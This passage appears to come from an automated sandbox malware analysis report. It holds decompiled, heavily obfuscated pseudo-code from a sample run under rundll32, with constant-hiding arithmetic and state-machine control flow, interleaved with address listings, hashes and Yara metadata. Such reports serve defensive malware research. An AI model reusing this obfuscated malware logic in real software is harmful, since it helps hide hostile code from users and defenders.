				_v156 = 0xc57f64;
				_v156 = _v156 << 0xe;
				_v156 = _v156 | 0xac310e4c;
				_t295 = 0x48;
				_v156 = _v156 / _t295;
				_v156 = _v156 ^ 0x038a2108;
				_v100 = 0xf9dfe5;
				_v100 = _v100 >> 0xc;
				_v100 = _v100 ^ 0x0009d912;
				_v112 = 0xb5688b;
				_t296 = 0x3d;
				_v112 = _v112 / _t296;
				_v112 = _v112 ^ 0x00064c77;
				_v116 = 0x80f1cc;
				_v116 = _v116 + 0xfffff23f;
				_v116 = _v116 ^ 0x008ab174;
				_v92 = 0xc78857;
				_v92 = _v92 | 0x5f9c477c;
				_v92 = _v92 ^ 0x5fdf5dba;
				_v148 = 0x3d8773;
				_v148 = _v148 >> 0xa;
				_v148 = _v148 | 0x15c33ced;
				_v148 = _v148 + 0xffff6977;
				_v148 = _v148 ^ 0x15c9e03a;
				_v140 = 0x8050fd;
				_v140 = _v140 + 0xffffb165;
				_v140 = _v140 ^ 0xb13fe806;
				_v140 = _v140 ^ 0xb1b5a353;
				_v104 = 0x3fa35;
				_v104 = _v104 ^ 0x0635ab8b;
				_v104 = _v104 ^ 0x0638ddfb;
				_v128 = 0x6276d2;
				_v128 = _v128 * 0x67;
				_v128 = _v128 >> 7;
				_v128 = _v128 ^ 0x004624e6;
				_v84 = 0xb2127e;
				_v84 = _v84 ^ 0xdd4df2db;
				_v84 = _v84 ^ 0xddf0f9d7;
				_v108 = 0x825106;
				_v108 = _v108 + 0x54ee;
				_v108 = _v108 ^ 0x00831379;
				_v96 = 0x675ffa;
				_v96 = _v96 + 0xffff86b7;
				_v96 = _v96 ^ 0x0064c66c;
				_v132 = 0x78c111;
				_v132 = _v132 >> 0xb;
				_v132 = _v132 + 0xffff7c58;
				_v132 = _v132 ^ 0xfff3b3ba;
				_v164 = 0xbe0848;
				_t297 = 0x46;
				_v164 = _v164 / _t297;
				_v164 = _v164 << 4;
				_v164 = _v164 >> 5;
				_v164 = _v164 ^ 0x00009249;
				_v152 = 0xd46630;
				_v152 = _v152 | 0x25786146;
				_v152 = _v152 << 6;
				_t298 = 0x4f;
				_v152 = _v152 / _t298;
				_v152 = _v152 ^ 0x0191f926;
				_v144 = 0xf6674c;
				_v144 = _v144 >> 6;
				_v144 = _v144 ^ 0xb535724d;
				_v144 = _v144 ^ 0xb53e6a0f;
				_v160 = 0x2a1e3b;
				_v160 = _v160 >> 5;
				_t299 = 0x76;
				_v160 = _v160 / _t299;
				_v160 = _v160 << 7;
				_v160 = _v160 ^ 0x00046312;
				_v120 = 0xf44552;
				_v120 = _v120 + 0xbd95;
				_v120 = _v120 ^ 0x00f02cb9;
				_v76 = 0x9a2b11;
				_v76 = _v76 << 6;
				_v76 = _v76 ^ 0x2684a730;
				_v80 = 0x6aeef9;
				_t300 = 0x51;
				_v80 = _v80 / _t300;
				_v80 = _v80 ^ 0x000c464e;
				_v124 = 0x84a5f5;
				_v124 = _v124 << 5;
				_v124 = _v124 + 0xddfe;
				_v124 = _v124 ^ 0x10975fd7;
				_v88 = 0xa441a9;
				_v88 = _v88 + 0x5567;
				_v88 = _v88 ^ 0x00aef9b7;
				goto L1;
				do {
					while(1) {
						L1:
						_t308 = _t260 - 0x8801db7;
						if(_t308 > 0) {
							break;
						}
						if(_t308 == 0) {
							E0082EC8F(_t302 + 0x1c,  &_v68, __eflags, _v80, _v124, _v88);
						} else {
							if(_t260 == 0x235eed) {
								E00824191( *((intOrPtr*)(_t302 + 0x18)),  &_v68, _v164, _v152);
								_t305 =  &(_t305[2]);
								_t260 = 0x85d9450;
								continue;
							} else {
								if(_t260 == 0x3e847b6) {
									_t260 = 0xab5e479;
									 *_t258 =  *_t258 & 0x00000000;
									_t258[1] = _v136;
									continue;
								} else {
									if(_t260 == 0x6ea21eb) {
										E00824191( *((intOrPtr*)(_t302 + 0x24)),  &_v68, _v84, _v108);
										_t305 =  &(_t305[2]);
										_t260 = 0x9265c01;
										continue;
									} else {
										if(_t260 == 0x80db57c) {
											E00824191( *((intOrPtr*)(_t302 + 0x30)),  &_v68, _v120, _v76);
											_t305 =  &(_t305[2]);
											_t260 = 0x8801db7;
											continue;
										} else {
											if(_t260 != 0x85d9450) {
												goto L24;
											} else {
												E00824191( *((intOrPtr*)(_t302 + 0x38)),  &_v68, _v144, _v160);
												_t305 =  &(_t305[2]);
												_t260 = 0x80db57c;
												continue;
											}
										}
									}
								}
							}
						}
						L27:
						__eflags =  *_t258;
						_t224 =  *_t258 != 0;
						__eflags = _t224;
						return 0 | _t224;
					}
					__eflags = _t260 - 0x9265c01;
					if(_t260 == 0x9265c01) {
						E00824191( *((intOrPtr*)(_t302 + 0x34)),  &_v68, _v96, _v132);
						_t305 =  &(_t305[2]);
						_t260 = 0x235eed;
						goto L24;
					} else {
						__eflags = _t260 - 0xa20e3fb;
						if(__eflags == 0) {
							E0082EC8F(_t302 + 8,  &_v68, __eflags, _v140, _v104, _v128);
							_t305 =  &(_t305[3]);
							_t260 = 0x6ea21eb;
							goto L1;
						} else {
							__eflags = _t260 - 0xab5e479;
							if(_t260 == 0xab5e479) {
								_t258[1] = E0083086E(_t302);
								_t260 = 0xffaf556;
								goto L1;
							} else {
								__eflags = _t260 - 0xf4853c6;
								if(_t260 == 0xf4853c6) {
									E008258C5(_v112, _v116, _v92, _v148, _t258,  &_v68);
									_t305 =  &(_t305[4]);
									_t260 = 0xa20e3fb;
									goto L1;
								} else {
									__eflags = _t260 - 0xffaf556;
									if(_t260 != 0xffaf556) {
										goto L24;
									} else {
										_push(_t260);
										_push(_t260);
										_t257 = E00822912(_t258[1]);
										 *_t258 = _t257;
										__eflags = _t257;
										if(__eflags != 0) {
											_t260 = 0xf4853c6;
											goto L1;
										}
									}
								}
							}
						}
					}
					goto L27;
					L24:
					__eflags = _t260 - 0x1d5478a;
				} while (__eflags != 0);
				goto L27;
			}










































                                                                                                                      0x008206a5
                                                                                                                      0x008206ac
                                                                                                                      0x008206af
                                                                                                                      0x008206b0
                                                                                                                      0x008206b8
                                                                                                                      0x008206b9
                                                                                                                      0x008206be
                                                                                                                      0x008206d2
                                                                                                                      0x008206d5
                                                                                                                      0x008206d8
                                                                                                                      0x008206df
                                                                                                                      0x008206e0
                                                                                                                      0x008206e1
                                                                                                                      0x008206e9
                                                                                                                      0x008206f1
                                                                                                                      0x008206f9
                                                                                                                      0x00820701
                                                                                                                      0x00820709
                                                                                                                      0x00820711
                                                                                                                      0x00820719
                                                                                                                      0x00820721
                                                                                                                      0x00820726
                                                                                                                      0x00820732
                                                                                                                      0x00820737
                                                                                                                      0x0082073d
                                                                                                                      0x00820745
                                                                                                                      0x0082074d
                                                                                                                      0x00820752
                                                                                                                      0x0082075a
                                                                                                                      0x00820766
                                                                                                                      0x00820769
                                                                                                                      0x0082076d
                                                                                                                      0x00820775
                                                                                                                      0x0082077d
                                                                                                                      0x00820785
                                                                                                                      0x0082078d
                                                                                                                      0x00820795
                                                                                                                      0x0082079d
                                                                                                                      0x008207a5
                                                                                                                      0x008207ad
                                                                                                                      0x008207b2
                                                                                                                      0x008207ba
                                                                                                                      0x008207c2
                                                                                                                      0x008207ca
                                                                                                                      0x008207d2
                                                                                                                      0x008207da
                                                                                                                      0x008207e2
                                                                                                                      0x008207ea
                                                                                                                      0x008207f2
                                                                                                                      0x008207fa
                                                                                                                      0x00820802
                                                                                                                      0x0082080f
                                                                                                                      0x00820813
                                                                                                                      0x00820818
                                                                                                                      0x00820820
                                                                                                                      0x00820828
                                                                                                                      0x00820830
                                                                                                                      0x00820838
                                                                                                                      0x00820840
                                                                                                                      0x00820848
                                                                                                                      0x00820850
                                                                                                                      0x00820858
                                                                                                                      0x00820860
                                                                                                                      0x00820868
                                                                                                                      0x00820870
                                                                                                                      0x00820875
                                                                                                                      0x0082087f
                                                                                                                      0x0082088c
                                                                                                                      0x0082089a
                                                                                                                      0x0082089f
                                                                                                                      0x008208a5
                                                                                                                      0x008208aa
                                                                                                                      0x008208af
                                                                                                                      0x008208b7
                                                                                                                      0x008208bf
                                                                                                                      0x008208c7
                                                                                                                      0x008208d0
                                                                                                                      0x008208d5
                                                                                                                      0x008208db
                                                                                                                      0x008208e3
                                                                                                                      0x008208eb
                                                                                                                      0x008208f0
                                                                                                                      0x008208f8
                                                                                                                      0x00820900
                                                                                                                      0x00820908
                                                                                                                      0x00820911
                                                                                                                      0x00820916
                                                                                                                      0x0082091c
                                                                                                                      0x00820921
                                                                                                                      0x00820929
                                                                                                                      0x00820931
                                                                                                                      0x00820939
                                                                                                                      0x00820941
                                                                                                                      0x00820949
                                                                                                                      0x0082094e
                                                                                                                      0x00820956
                                                                                                                      0x00820962
                                                                                                                      0x0082096a
                                                                                                                      0x0082096e
                                                                                                                      0x00820976
                                                                                                                      0x0082097e
                                                                                                                      0x00820983
                                                                                                                      0x0082098b
                                                                                                                      0x00820993
                                                                                                                      0x0082099b
                                                                                                                      0x008209a3
                                                                                                                      0x008209a3
                                                                                                                      0x008209ab
                                                                                                                      0x008209ab
                                                                                                                      0x008209ab
                                                                                                                      0x008209ab
                                                                                                                      0x008209ad
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x008209b3
                                                                                                                      0x00820b6b
                                                                                                                      0x008209b9
                                                                                                                      0x008209bf
                                                                                                                      0x00820a66
                                                                                                                      0x00820a6b
                                                                                                                      0x00820a6e
                                                                                                                      0x00000000
                                                                                                                      0x008209c5
                                                                                                                      0x008209cb
                                                                                                                      0x00820a47
                                                                                                                      0x00820a4c
                                                                                                                      0x00820a4f
                                                                                                                      0x00000000
                                                                                                                      0x008209cd
                                                                                                                      0x008209d3
                                                                                                                      0x00820a31
                                                                                                                      0x00820a36
                                                                                                                      0x00820a39
                                                                                                                      0x00000000
                                                                                                                      0x008209d5
                                                                                                                      0x008209db
                                                                                                                      0x00820a16
                                                                                                                      0x00820a1b
                                                                                                                      0x00820a1e
                                                                                                                      0x00000000
                                                                                                                      0x008209dd
                                                                                                                      0x008209e3
                                                                                                                      0x00000000
                                                                                                                      0x008209e9
                                                                                                                      0x008209f8
                                                                                                                      0x008209fd
                                                                                                                      0x00820a00
                                                                                                                      0x00000000
                                                                                                                      0x00820a00
                                                                                                                      0x008209e3
                                                                                                                      0x008209db
                                                                                                                      0x008209d3
                                                                                                                      0x008209cb
                                                                                                                      0x008209bf
                                                                                                                      0x00820b74
                                                                                                                      0x00820b76
                                                                                                                      0x00820b7a
                                                                                                                      0x00820b7a
                                                                                                                      0x00820b84
                                                                                                                      0x00820b84
                                                                                                                      0x00820a78
                                                                                                                      0x00820a7e
                                                                                                                      0x00820b3d
                                                                                                                      0x00820b42
                                                                                                                      0x00820b45
                                                                                                                      0x00000000
                                                                                                                      0x00820a84
                                                                                                                      0x00820a84
                                                                                                                      0x00820a8a
                                                                                                                      0x00820b1c
                                                                                                                      0x00820b21
                                                                                                                      0x00820b24
                                                                                                                      0x00000000
                                                                                                                      0x00820a8c
                                                                                                                      0x00820a8c
                                                                                                                      0x00820a92
                                                                                                                      0x00820afc
                                                                                                                      0x00820aff
                                                                                                                      0x00000000
                                                                                                                      0x00820a94
                                                                                                                      0x00820a94
                                                                                                                      0x00820a96
                                                                                                                      0x00820ae3
                                                                                                                      0x00820ae8
                                                                                                                      0x00820aeb
                                                                                                                      0x00000000
                                                                                                                      0x00820a98
                                                                                                                      0x00820a98
                                                                                                                      0x00820a9e
                                                                                                                      0x00000000
                                                                                                                      0x00820aa4
                                                                                                                      0x00820ab0
                                                                                                                      0x00820ab1
                                                                                                                      0x00820ab5
                                                                                                                      0x00820aba
                                                                                                                      0x00820abe
                                                                                                                      0x00820ac0
                                                                                                                      0x00820ac6
                                                                                                                      0x00000000
                                                                                                                      0x00820ac6
                                                                                                                      0x00820ac0
                                                                                                                      0x00820a9e
                                                                                                                      0x00820a96
                                                                                                                      0x00820a92
                                                                                                                      0x00820a8a
                                                                                                                      0x00000000
                                                                                                                      0x00820b4a
                                                                                                                      0x00820b4a
                                                                                                                      0x00820b4a
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_810000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Fax%$gU$$F$T$^#$^#
                                                                                                                      • API String ID: 0-2311862416
                                                                                                                      • Opcode ID: ec0ed06aba5dba57669efc6d06ae299f3cdbf4a225dd5178920b32f9c929715b
                                                                                                                      • Instruction ID: e0fd17852f250047d3e4bce44f72abe4f06303559dee3c5ab17819124a4da036
                                                                                                                      • Opcode Fuzzy Hash: ec0ed06aba5dba57669efc6d06ae299f3cdbf4a225dd5178920b32f9c929715b
                                                                                                                      • Instruction Fuzzy Hash: B7C162715087809FC768CF65D88981FBBE2FBD4718F504A1CF6868A262D3B58988CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00822A3D Relevance: 7.8, Strings: 6, Instructions: 259COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 74%
                                                                                                                      			E00822A3D(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a28) {
				intOrPtr _v60;
				char _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				char _t264;
				signed int _t295;
				signed int _t298;
				signed int _t299;
				signed int _t300;
				signed int _t301;
				signed int _t302;
				signed int _t303;
				signed int _t304;
				void* _t307;
				void* _t308;
				void* _t334;
				intOrPtr _t335;
				signed int* _t338;

				_push(_a28);
				_t334 = __ecx;
				_push(0);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(__ecx);
				_t264 = E0081C325(0);
				_v72 = _t264;
				_t335 = _t264;
				_v124 = 0xc44be;
				_t338 =  &(( &_v176)[9]);
				_v124 = _v124 + 0xffff24c4;
				_t307 = 0xc36eaf9;
				_t298 = 0x37;
				_v124 = _v124 * 0x2e;
				_v124 = _v124 ^ 0x020cf15c;
				_v176 = 0xedca77;
				_v176 = _v176 * 0x1f;
				_v176 = _v176 << 4;
				_v176 = _v176 + 0xdbf9;
				_v176 = _v176 ^ 0xccb922a9;
				_v120 = 0x5a606;
				_v120 = _v120 | 0xc9e49228;
				_t299 = 0x62;
				_v120 = _v120 / _t298;
				_v120 = _v120 ^ 0x03ad0d8c;
				_v144 = 0x918442;
				_v144 = _v144 >> 0xd;
				_v144 = _v144 * 0x3e;
				_v144 = _v144 + 0xa3d5;
				_v144 = _v144 ^ 0x0007140c;
				_v88 = 0x37923f;
				_v88 = _v88 ^ 0x32449291;
				_v88 = _v88 ^ 0x3276c44e;
				_v168 = 0xa5175f;
				_v168 = _v168 + 0x6cd0;
				_v168 = _v168 >> 0xd;
				_v168 = _v168 + 0x50d;
				_v168 = _v168 ^ 0x000b28ed;
				_v96 = 0x8bb9e8;
				_v96 = _v96 ^ 0x9313002a;
				_v96 = _v96 ^ 0x93929827;
				_v128 = 0x9b97bd;
				_v128 = _v128 >> 9;
				_v128 = _v128 + 0x506c;
				_v128 = _v128 ^ 0x0008f405;
				_v136 = 0x162b;
				_v136 = _v136 << 0xe;
				_v136 = _v136 ^ 0xcbe41246;
				_v136 = _v136 ^ 0xce6e1682;
				_v160 = 0xb72d70;
				_v160 = _v160 >> 8;
				_v160 = _v160 ^ 0x815bd7a2;
				_v160 = _v160 ^ 0x177336f3;
				_v160 = _v160 ^ 0x962c98d3;
				_v100 = 0xe545e5;
				_v100 = _v100 + 0xffffaae8;
				_v100 = _v100 | 0x514a639c;
				_v100 = _v100 ^ 0x51eea269;
				_v152 = 0xd9d32c;
				_v152 = _v152 >> 8;
				_v152 = _v152 ^ 0x78b07b8d;
				_v152 = _v152 / _t299;
				_v152 = _v152 ^ 0x01343475;
				_v92 = 0x6219a9;
				_v92 = _v92 << 8;
				_v92 = _v92 ^ 0x6210c938;
				_v80 = 0x3ff2a1;
				_v80 = _v80 + 0xffff7ea3;
				_v80 = _v80 ^ 0x003f2f73;
				_v164 = 0xe5565b;
				_v164 = _v164 + 0xffff5b62;
				_t300 = 0x78;
				_v164 = _v164 * 6;
				_v164 = _v164 / _t300;
				_v164 = _v164 ^ 0x000727eb;
				_v76 = 0x250d2;
				_v76 = _v76 | 0x8f851c12;
				_v76 = _v76 ^ 0x8f8220e2;
				_v116 = 0x568e;
				_v116 = _v116 ^ 0x3d61f204;
				_v116 = _v116 << 7;
				_v116 = _v116 ^ 0xb0d54eba;
				_v172 = 0xa5a4a3;
				_v172 = _v172 | 0xd2f7b266;
				_v172 = _v172 >> 0xd;
				_t301 = 0x7f;
				_v172 = _v172 * 0x30;
				_v172 = _v172 ^ 0x0132b547;
				_v112 = 0xd0329d;
				_v112 = _v112 * 0x58;
				_v112 = _v112 << 3;
				_v112 = _v112 ^ 0x3c81866c;
				_v104 = 0x844e69;
				_v104 = _v104 << 0xc;
				_v104 = _v104 >> 4;
				_v104 = _v104 ^ 0x0443b556;
				_v84 = 0x1d6374;
				_v84 = _v84 >> 0xd;
				_v84 = _v84 ^ 0x000df0de;
				_v148 = 0x6585fd;
				_v148 = _v148 / _t301;
				_t302 = 0x77;
				_v148 = _v148 / _t302;
				_v148 = _v148 >> 0xa;
				_v148 = _v148 ^ 0x000a9d1a;
				_v156 = 0xff5a31;
				_v156 = _v156 + 0xce45;
				_t303 = 0x29;
				_v156 = _v156 / _t303;
				_v156 = _v156 << 1;
				_v156 = _v156 ^ 0x0008392b;
				_v132 = 0x13d5b5;
				_v132 = _v132 << 0x10;
				_v132 = _v132 + 0xffff95f7;
				_v132 = _v132 ^ 0xd5b1b27f;
				_v108 = 0x3556bb;
				_v108 = _v108 * 0x4f;
				_v108 = _v108 + 0xffff90f3;
				_v108 = _v108 ^ 0x10791788;
				_v140 = 0x81de0d;
				_t304 = 0x6d;
				_v140 = _v140 / _t304;
				_v140 = _v140 + 0xf4b;
				_v140 = _v140 * 0x26;
				_v140 = _v140 ^ 0x002a9917;
				do {
					while(_t307 != 0x688d2d5) {
						if(_t307 == 0x8a4f536) {
							_t295 = E00824F0E(_a28, _v120,  &_v72, _v144);
							_t338 =  &(_t338[3]);
							__eflags = _t295;
							if(_t295 != 0) {
								_t307 = 0x688d2d5;
								continue;
							}
						} else {
							if(_t307 == 0x94a3104) {
								E00816234(_v132, _v72, _v108, _v140);
							} else {
								if(_t307 != 0xc36eaf9) {
									goto L9;
								} else {
									_t307 = 0x8a4f536;
									continue;
								}
							}
						}
						L12:
						return _t335;
					}
					_push(_v128);
					_push(_v96);
					_push(_v168);
					_push(_v88);
					_t308 = 0x44;
					E00830710(_t308,  &_v68);
					_push(_v152);
					_v68 = 0x44;
					_push(_v100);
					_t309 = _v136;
					_push(0x10001800);
					_v60 = E00819F66(_v136, _v160, __eflags);
					__eflags = _v176 | _v124;
					_t335 = E0082BCBD(_v92, _v136, _v80, _v136, _t309, _v164, _v76, _a20, _v116, _t334, _a28, _v172, _v176 | _v124, 0, _v112,  &_v68, _v72, _v104);
					E0081A203(_v84, _v148, _v156, _v60);
					_t338 =  &(_t338[0x1a]);
					_t307 = 0x94a3104;
					L9:
					__eflags = _t307 - 0xce6287b;
				} while (_t307 != 0xce6287b);
				goto L12;
			}














































                                                                                                                      0x00822a47
                                                                                                                      0x00822a50
                                                                                                                      0x00822a52
                                                                                                                      0x00822a53
                                                                                                                      0x00822a5a
                                                                                                                      0x00822a61
                                                                                                                      0x00822a68
                                                                                                                      0x00822a6f
                                                                                                                      0x00822a76
                                                                                                                      0x00822a77
                                                                                                                      0x00822a78
                                                                                                                      0x00822a7d
                                                                                                                      0x00822a84
                                                                                                                      0x00822a86
                                                                                                                      0x00822a8e
                                                                                                                      0x00822a91
                                                                                                                      0x00822aa0
                                                                                                                      0x00822aa7
                                                                                                                      0x00822aaa
                                                                                                                      0x00822aae
                                                                                                                      0x00822ab6
                                                                                                                      0x00822ac3
                                                                                                                      0x00822ac7
                                                                                                                      0x00822acc
                                                                                                                      0x00822ad4
                                                                                                                      0x00822adc
                                                                                                                      0x00822ae4
                                                                                                                      0x00822af2
                                                                                                                      0x00822af3
                                                                                                                      0x00822af7
                                                                                                                      0x00822aff
                                                                                                                      0x00822b07
                                                                                                                      0x00822b11
                                                                                                                      0x00822b15
                                                                                                                      0x00822b1d
                                                                                                                      0x00822b25
                                                                                                                      0x00822b2d
                                                                                                                      0x00822b35
                                                                                                                      0x00822b3d
                                                                                                                      0x00822b45
                                                                                                                      0x00822b4d
                                                                                                                      0x00822b52
                                                                                                                      0x00822b5a
                                                                                                                      0x00822b62
                                                                                                                      0x00822b6a
                                                                                                                      0x00822b72
                                                                                                                      0x00822b7a
                                                                                                                      0x00822b82
                                                                                                                      0x00822b87
                                                                                                                      0x00822b8f
                                                                                                                      0x00822b97
                                                                                                                      0x00822b9f
                                                                                                                      0x00822ba4
                                                                                                                      0x00822bac
                                                                                                                      0x00822bb4
                                                                                                                      0x00822bbc
                                                                                                                      0x00822bc1
                                                                                                                      0x00822bc9
                                                                                                                      0x00822bd1
                                                                                                                      0x00822bd9
                                                                                                                      0x00822be1
                                                                                                                      0x00822be9
                                                                                                                      0x00822bf1
                                                                                                                      0x00822bf9
                                                                                                                      0x00822c01
                                                                                                                      0x00822c06
                                                                                                                      0x00822c18
                                                                                                                      0x00822c1e
                                                                                                                      0x00822c26
                                                                                                                      0x00822c2e
                                                                                                                      0x00822c33
                                                                                                                      0x00822c3b
                                                                                                                      0x00822c43
                                                                                                                      0x00822c4b
                                                                                                                      0x00822c53
                                                                                                                      0x00822c5b
                                                                                                                      0x00822c68
                                                                                                                      0x00822c6b
                                                                                                                      0x00822c77
                                                                                                                      0x00822c7b
                                                                                                                      0x00822c83
                                                                                                                      0x00822c8b
                                                                                                                      0x00822c93
                                                                                                                      0x00822c9b
                                                                                                                      0x00822ca3
                                                                                                                      0x00822cab
                                                                                                                      0x00822cb0
                                                                                                                      0x00822cb8
                                                                                                                      0x00822cc0
                                                                                                                      0x00822cc8
                                                                                                                      0x00822cd2
                                                                                                                      0x00822cd5
                                                                                                                      0x00822cd9
                                                                                                                      0x00822ce1
                                                                                                                      0x00822cee
                                                                                                                      0x00822cf2
                                                                                                                      0x00822cf7
                                                                                                                      0x00822cff
                                                                                                                      0x00822d07
                                                                                                                      0x00822d0c
                                                                                                                      0x00822d11
                                                                                                                      0x00822d19
                                                                                                                      0x00822d21
                                                                                                                      0x00822d26
                                                                                                                      0x00822d2e
                                                                                                                      0x00822d3e
                                                                                                                      0x00822d46
                                                                                                                      0x00822d4b
                                                                                                                      0x00822d51
                                                                                                                      0x00822d56
                                                                                                                      0x00822d5e
                                                                                                                      0x00822d66
                                                                                                                      0x00822d72
                                                                                                                      0x00822d75
                                                                                                                      0x00822d79
                                                                                                                      0x00822d7d
                                                                                                                      0x00822d85
                                                                                                                      0x00822d8d
                                                                                                                      0x00822d92
                                                                                                                      0x00822d9a
                                                                                                                      0x00822da2
                                                                                                                      0x00822daf
                                                                                                                      0x00822db3
                                                                                                                      0x00822dbb
                                                                                                                      0x00822dc3
                                                                                                                      0x00822dd8
                                                                                                                      0x00822de0
                                                                                                                      0x00822de4
                                                                                                                      0x00822df1
                                                                                                                      0x00822df5
                                                                                                                      0x00822dfd
                                                                                                                      0x00822dfd
                                                                                                                      0x00822e03
                                                                                                                      0x00822e35
                                                                                                                      0x00822e3a
                                                                                                                      0x00822e3d
                                                                                                                      0x00822e3f
                                                                                                                      0x00822e45
                                                                                                                      0x00000000
                                                                                                                      0x00822e45
                                                                                                                      0x00822e05
                                                                                                                      0x00822e0b
                                                                                                                      0x00822f31
                                                                                                                      0x00822e11
                                                                                                                      0x00822e17
                                                                                                                      0x00000000
                                                                                                                      0x00822e1d
                                                                                                                      0x00822e1d
                                                                                                                      0x00000000
                                                                                                                      0x00822e1d
                                                                                                                      0x00822e17
                                                                                                                      0x00822e0b
                                                                                                                      0x00822f39
                                                                                                                      0x00822f44
                                                                                                                      0x00822f44
                                                                                                                      0x00822e49
                                                                                                                      0x00822e54
                                                                                                                      0x00822e58
                                                                                                                      0x00822e5c
                                                                                                                      0x00822e62
                                                                                                                      0x00822e63
                                                                                                                      0x00822e68
                                                                                                                      0x00822e6c
                                                                                                                      0x00822e77
                                                                                                                      0x00822e7f
                                                                                                                      0x00822e83
                                                                                                                      0x00822e90
                                                                                                                      0x00822eac
                                                                                                                      0x00822ef2
                                                                                                                      0x00822f03
                                                                                                                      0x00822f08
                                                                                                                      0x00822f0b
                                                                                                                      0x00822f10
                                                                                                                      0x00822f10
                                                                                                                      0x00822f10
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_810000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: *$D$[V$lP$s/?$E
                                                                                                                      • API String ID: 0-4039435091
                                                                                                                      • Opcode ID: 069ea14ee9a12fcdf10bed25a08896db3a4c5dcc2c46f0827f78cac7be91594e
                                                                                                                      • Instruction ID: b5850d847cf58d5e6f09764c904d92ff19ed6f5d2e415837b610e33d9aa3d2ba
                                                                                                                      • Opcode Fuzzy Hash: 069ea14ee9a12fcdf10bed25a08896db3a4c5dcc2c46f0827f78cac7be91594e
                                                                                                                      • Instruction Fuzzy Hash: 5DC13F71508380AFD364CF64C98AA1BFBE1FBD8748F509A1DF69586260C7B98948CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00817CF4 Relevance: 7.7, Strings: 6, Instructions: 235COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 90%
                                                                                                                      			E00817CF4(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _t258;
				signed int _t271;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				void* _t303;
				void* _t304;
				signed int* _t307;

				_t307 =  &_v1668;
				_v1644 = 0x34739e;
				_v1644 = _v1644 * 0x43;
				_t303 = __ecx;
				_v1644 = _v1644 >> 0xb;
				_t304 = 0x422d362;
				_t271 = 0x7d;
				_v1644 = _v1644 / _t271;
				_v1644 = _v1644 ^ 0x00084d9c;
				_v1612 = 0xb20ebf;
				_v1612 = _v1612 << 0xe;
				_v1612 = _v1612 ^ 0x83a04dde;
				_v1580 = 0xaa66ba;
				_v1580 = _v1580 + 0xffff0111;
				_v1580 = _v1580 ^ 0x00ac31ef;
				_v1604 = 0x4a91ac;
				_v1604 = _v1604 | 0x86032005;
				_v1604 = _v1604 ^ 0x86453654;
				_v1660 = 0x3cdcbf;
				_t272 = 0x34;
				_v1660 = _v1660 / _t272;
				_v1660 = _v1660 << 9;
				_t273 = 0x19;
				_v1660 = _v1660 * 0x33;
				_v1660 = _v1660 ^ 0x776ddfce;
				_v1620 = 0xfdfe87;
				_v1620 = _v1620 | 0x8debc5e9;
				_v1620 = _v1620 ^ 0x8df4241a;
				_v1596 = 0xc5e4de;
				_v1596 = _v1596 / _t273;
				_v1596 = _v1596 ^ 0x000ab9e2;
				_v1568 = 0x4c47da;
				_v1568 = _v1568 + 0x5d3c;
				_v1568 = _v1568 ^ 0x0043a9f3;
				_v1564 = 0xed5f6a;
				_t274 = 0x2a;
				_v1564 = _v1564 / _t274;
				_v1564 = _v1564 ^ 0x00049b09;
				_v1588 = 0xe27f75;
				_t275 = 0x68;
				_v1588 = _v1588 * 0x15;
				_v1588 = _v1588 ^ 0x129f57f0;
				_v1572 = 0x58913e;
				_v1572 = _v1572 + 0xffff0520;
				_v1572 = _v1572 ^ 0x005b93ab;
				_v1648 = 0xac4e73;
				_v1648 = _v1648 >> 8;
				_v1648 = _v1648 >> 0x10;
				_v1648 = _v1648 << 3;
				_v1648 = _v1648 ^ 0x000ac3bf;
				_v1668 = 0x5a6a4e;
				_t90 =  &_v1668; // 0x5a6a4e
				_v1668 =  *_t90 * 0x58;
				_t92 =  &_v1668; // 0x5a6a4e
				_v1668 =  *_t92 / _t275;
				_v1668 = _v1668 << 1;
				_v1668 = _v1668 ^ 0x009738dd;
				_v1640 = 0x7a6607;
				_t276 = 0x65;
				_v1640 = _v1640 * 0xa;
				_v1640 = _v1640 >> 9;
